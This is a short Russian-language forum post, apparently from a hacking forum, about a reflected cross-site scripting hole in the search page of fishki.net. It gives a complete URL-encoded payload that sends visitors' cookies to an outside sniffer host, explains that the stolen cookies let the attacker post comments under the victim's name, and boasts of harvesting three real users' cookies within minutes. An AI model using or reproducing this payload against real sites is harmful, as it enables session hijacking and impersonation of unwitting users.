Пассивная XSS в поиске на популярном сайте _www.fishki.net:
если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Imag e%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru %2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript %3E
То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.